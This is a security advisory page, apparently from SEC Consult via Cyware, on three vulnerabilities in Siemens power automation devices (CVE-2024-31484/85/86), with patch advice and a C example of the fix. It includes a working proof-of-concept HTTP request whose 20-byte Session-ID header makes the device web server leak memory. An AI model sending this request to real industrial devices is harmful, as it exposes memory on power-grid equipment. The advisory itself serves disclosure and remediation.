[Cyware] Multiple Vulnerabilities in Siemens Power Automation Products (CP-8000/CP-8021/CP8-022/CP-8031/CP-8050/SICORE)

Summary: This SEC Consult advisory describes three vulnerabilities in Siemens power automation products (a buffer overread in the web server, a privilege escalation through interception of unencrypted web traffic, and cleartext storage of MQTT client passwords) and gives the business recommendation for addressing them.

Threat Actor: N/A

Victim: N/A

Key Points:

  • The vendor, Siemens, is a technology company focused on industry, infrastructure, transport, and healthcare.
  • SEC Consult recommends installing the patch provided by the vendor and conducting a thorough security review of the product.
  • The vulnerabilities described are a buffer overread in the web server of certain models, a privilege escalation via interception of unencrypted web-interface traffic, and unsafe storage of MQTT client passwords.

Vendor description

We are a technology company focused on industry, infrastructure, transport, and healthcare. From more resource-efficient factories, resilient supply chains, and smarter buildings and grids, to cleaner and more comfortable transportation as well as advanced healthcare, we create technology with purpose adding real value for customers.

Source: https://new.siemens.com/global/en/company/about.html

Business recommendation

The vendor provides a patch which should be installed immediately.

SEC Consult highly recommends performing a thorough security review of the product, conducted by security professionals, to identify and resolve potential further security issues.

Vulnerability overview/description

1) Buffer Overread (Only CP-8000/CP-8021/CP-8022/CP-8031/CP-8050/CPCX26/PCCX26/ETA4/ETA5, CVE-2024-31484)

The webserver running on the CP-8050 and CP-8031 contains a buffer overread vulnerability.

The value of the HTTP header “Session-ID” is processed and used in a “strncpy” call without proper termination. Thus, data structures from the BSS segment will be leaked in the response. Attackers might be able to read sensitive data from memory.

2) Privilege Escalation (Only CP-8031/CP-8050 and SICORE devices, CVE-2024-31485)

An attacker with an account with the viewer (or higher) role can intercept unencrypted traffic of other users of the web interface. Thus, the attacker can capture the usernames and passwords of higher-privileged accounts and might gain access to those accounts to perform tasks with elevated privileges.

3) Unsafe Storage of MQTT Client Passwords (Only CP-8031/CP-8050, CVE-2024-31486)

A PLC with the OPUPI0 MQTT application installed is able to connect to an MQTT server. The configured MQTT password for the server is stored in cleartext on the device and can be read by exploiting a potential code execution or file disclosure vulnerability or with physical access to the device.

Proof of concept

1) Buffer Overread (Only CP-8000/CP-8021/CP-8022/CP-8031/CP-8050/CPCX26/PCCX26/ETA4/ETA5, CVE-2024-31484)

The buffer overread can be triggered by sending a “Session-ID” HTTP request header whose value is exactly 20 bytes long, for example with this request:

POST /SICAM_TOOLBOX_1703_remote_connection_00.htm HTTP/1.1
User-Agent: SICAM TOOLBOX II
Version: 1
Session-ID: 3814280BA9921c6cAAAA
Sequence-ID: 1
Content-Length: 8
Content-Type: text/plain
KeepAlive: 5
Connection: close

type=3

The server answers with the following response:

HTTP/1.1 200 OK
Server: SICAM 1703
Version: 1
Session-ID: 3814280BA9921c6cAAAAæk¤
Cache-Control: max-age=0, private
X-Frame-Options: sameorigin
Strict-Transport-Security: max-age=31536000; includeSubdomains
Content-Security-Policy: default-src 'self' data: blob: 'unsafe-inline' 'unsafe-eval'
X-XSS-Protection: 1; mode=block
X-Permitted-Cross-Domain-Policies: none
Content-Length: 71
Connection: close
Date: Wed, 30 Mar 2022 01:38:37 GMT

Sequence-ID: 1
Content-Type: text/plain
Content-Length: 8

type=4

The Session-ID in the response leaks at least 4 additional bytes. Further, the structure of the response is broken, as some HTTP headers are suddenly part of the body.

The vulnerability most likely stems from a misuse of the strncpy function. The following code segment was analyzed (RTUM85.elf, Offset 0x1d50de):

/* Decompiled excerpt; the session_id destination is a global (BSS) buffer of 0x14 bytes */
ptr_fcgi_header = get_fcgi_param(fcgi_struct, "HTTP_SESSION_ID");
if (ptr_fcgi_header == (char*) 0x00) goto LAB_001d4a66;
if ( is_a_session_available == 0 ) {
    /* length equals the buffer size: a 0x14-byte value leaves no room for the terminating null byte */
    strncpy(&session_id, ptr_fcgi_header, 0x14);
}

strncpy is called with a length parameter of 0x14. To trigger the vulnerability, we send exactly 0x14 bytes. Thus, we believe that the global session_id variable is never properly terminated with a null byte.

libc’s documentation even contains a warning for this case: “If there is no null byte among the first n bytes of src, the string placed in dest will not be null-terminated.”

Thus, when the response is built, every data structure in BSS following the session_id global is copied into the response as part of the string until a null byte is encountered.
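To make the strncpy failure mode and its fix concrete, here is an added C example written for this page; it is not code from the advisory or from the Siemens firmware. It models the device's global state as a constructed struct in which a 0x14-byte session buffer is directly followed by another variable (standing in for adjacent BSS globals; the layout is an assumption), shows that a 20-byte value leaves the buffer unterminated, contrasts a `%s` response builder with one whose width is bounded, and replaces the copy with one that rejects over-long values and terminates explicitly. All function names, the struct, and the `LEAKME` marker are constructed for illustration.

```c
#include <stdio.h>
#include <string.h>
#include <stdbool.h>

#define SESSION_ID_LEN 0x14   /* 20: the length passed to strncpy in the analyzed code */

/* Constructed stand-in for the firmware's global state: a fixed-size session
 * buffer immediately followed by another variable, like consecutive BSS
 * globals. The layout is an assumption for illustration only. */
struct session_state {
    char session_id[SESSION_ID_LEN];
    char next_global[16];
};

/* Length of s without ever looking further than max bytes (safe on an
 * unterminated buffer; written out so the block does not depend on strnlen). */
static size_t bounded_len(const char *s, size_t max)
{
    size_t i = 0;
    while (i < max && s[i] != '\0')
        i++;
    return i;
}

/* Vulnerable pattern from the advisory: strncpy with n equal to the buffer
 * size. A 20-byte value fills the buffer and no terminator is written. */
void set_session_id_unsafe(struct session_state *st, const char *value)
{
    strncpy(st->session_id, value, SESSION_ID_LEN);
}

/* Hardened: reject a value that does not fit together with its terminator (a
 * session token should not be silently truncated), then copy and terminate. */
int set_session_id_safe(struct session_state *st, const char *value)
{
    size_t n = bounded_len(value, SESSION_ID_LEN);
    if (n >= SESSION_ID_LEN)
        return -1;
    memcpy(st->session_id, value, n);
    st->session_id[n] = '\0';
    return 0;
}

/* True if the stored ID is terminated inside its own buffer. memchr is
 * bounded, so this check itself cannot overread. */
bool session_id_is_terminated(const struct session_state *st)
{
    return memchr(st->session_id, '\0', SESSION_ID_LEN) != NULL;
}

/* Response builder as the advisory describes it: "%s" keeps reading past the
 * unterminated buffer into whatever follows until it meets a null byte. */
int format_session_header_unsafe(const struct session_state *st, char *out, size_t outsz)
{
    return snprintf(out, outsz, "Session-ID: %s\r\n", st->session_id);
}

/* Defensive response builder: bound the width with %.*s so that at most
 * SESSION_ID_LEN bytes of the field are emitted, terminated or not. */
int format_session_header_safe(const struct session_state *st, char *out, size_t outsz)
{
    int len = (int)bounded_len(st->session_id, SESSION_ID_LEN);
    return snprintf(out, outsz, "Session-ID: %.*s\r\n", len, st->session_id);
}

/* Walk through the advisory's trigger with a constructed 20-byte Session-ID
 * and a constructed marker in the neighbouring global. Returns 0 on success. */
int demo(void)
{
    struct session_state st;
    char out[64];
    memset(&st, 0, sizeof st);
    memcpy(st.next_global, "LEAKME", 7);       /* constructed value next in memory */

    set_session_id_unsafe(&st, "3814280BA9921c6cAAAA"); /* exactly 0x14 bytes */
    if (session_id_is_terminated(&st))
        return 1;                               /* expected: no terminator */
    format_session_header_unsafe(&st, out, sizeof out);
    printf("unsafe: %s", out);                  /* LEAKME follows the ID */
    format_session_header_safe(&st, out, sizeof out);
    printf("safe:   %s", out);                  /* stops after 20 bytes */

    if (set_session_id_safe(&st, "3814280BA9921c6cAAAA") != -1)
        return 2;                               /* 20 bytes must be rejected */
    if (set_session_id_safe(&st, "3814280BA9921c6c") != 0)
        return 3;
    return session_id_is_terminated(&st) ? 0 : 4;
}

int main(void)
{
    return demo();
}
```

The two halves of the fix are independent: bounding the copy stops the buffer from ever being unterminated, and bounding the output means that even a buffer left unterminated by some other path cannot drag adjacent memory into an HTTP header. Rejecting over-long values rather than truncating them is a deliberate choice for a session identifier, where a silently shortened token would collide with or fail to match the real one.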

Source: https://sec-consult.com/vulnerability-lab/advisory/multiple-vulnerabilities-in-siemens-power-automation-products-cp-8000-cp-8021-cp8-022-cp-8031-cp-8050-sicore


“An interesting youtube video that may be related to the article above”